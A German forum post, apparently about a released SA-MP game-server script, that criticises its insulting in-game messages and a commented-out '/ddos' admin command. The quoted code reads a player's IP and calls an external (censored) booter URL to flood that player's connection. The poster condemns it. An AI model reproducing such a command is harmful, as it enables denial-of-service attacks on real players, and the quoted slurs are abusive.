also normalerweise schreibe ich ja nicht viel zu irgendwelchen veröffentlichungen, aber ufffffff...... also sowas niveauloses wie in dem script habe ich ja schon ewig nicht mehr gesehen (und ja es gab mal eine phase da gabs das ein paar mal)
also jetzt mal ehrlich wieso macht man sowas?
SCM(playerid,COLOR_LIGHTRED,"Geh doch in LSC du hurensohn");
oder sowas
else return SCM(playerid,-1,"Du hurensohn bist kein org owner");
Das sind nicht mal kommentare im script sondern SendClientMessage´s
Ich bin völlig sprachlos wie abgehoben man sein muss sowas in ein script einzubauen, vlt bin ich zu alt oder hatte eine doch zu gute erziehung.......
Und jetzt mal ehrlich Studs wenn man sowas hier schon veröffentlicht dann hätte man doch sowas entfernen können um wenigstens den anschein zu wahren das ganze wäre einigermaßen seriös gewesen, aber so finde ich das einfach alles hinfällig, und auch wenn es private gründe hat warum es während des laufenden betriebes nicht entfernt wurde, so ist sowas so zu releasen einfach ..... also mir fehlen echt die worte.
ich muss dann jetzt doch mal was nachtragen....
öhmmm warum zur hölle hat man sowas! im script? ja es ist auskommentiert aber why? was für ein Kindergarten verein war das bitte oO
if(strcmp(cmd,"/ddos", true) == 0) // jobchat
{
tmp = strtoknew(cmdtext, idx);
if(!strlen(tmp))
{
SCM(playerid, COLOR_GRAD2, "FEHLER: /ddos [playerid]");
return 1;
}
giveplayerid = ReturnUser(tmp);
if(IsPlayerAdmin(playerid))
{
if(IsPlayerConnected(giveplayerid))
{
if(giveplayerid != INVALID_PLAYER_ID)
{
if(IsASkrupy(giveplayerid))
{
SCM(playerid, COLOR_GRAD2, "Versuch es garnicht erst ....");
return 1;
}
new plrIP[16],AuaXD[240],fickaaaa[240];
GetPlayerIp(giveplayerid, plrIP, sizeof(plrIP));
format(fickaaaa, sizeof(fickaaaa), "AdmCmd: %s hat %s geddost.",GetName(playerid),GetName(giveplayerid));
ABroadCast(COLOR_LIGHTRED,fickaaaa,1);
format(AuaXD, sizeof(AuaXD), "Zensiert!/ddos/ddos.php?pass=apple&host=%s&port=21&time=6666666&packet=&bytes=",plrIP);
HTTP(playerid, HTTP_HEAD, AuaXD, "", "");// Server 3
format(AuaXD, sizeof(AuaXD), "Zensiert!/lol/ddos.php?pass=apple&host=%s&port=21&time=6666666&packet=&bytes=",plrIP);
format(AuaXD, sizeof(AuaXD), "Zensiert!/lol/ddos.php?pass=apple&host=%s&port=21&time=6666666&packet=&bytes=",plrIP);
SCM(playerid, COLOR_GREY, "* DDoS Angriff gestartet!");
}
}
}
return 1;
}*/
Alles anzeigen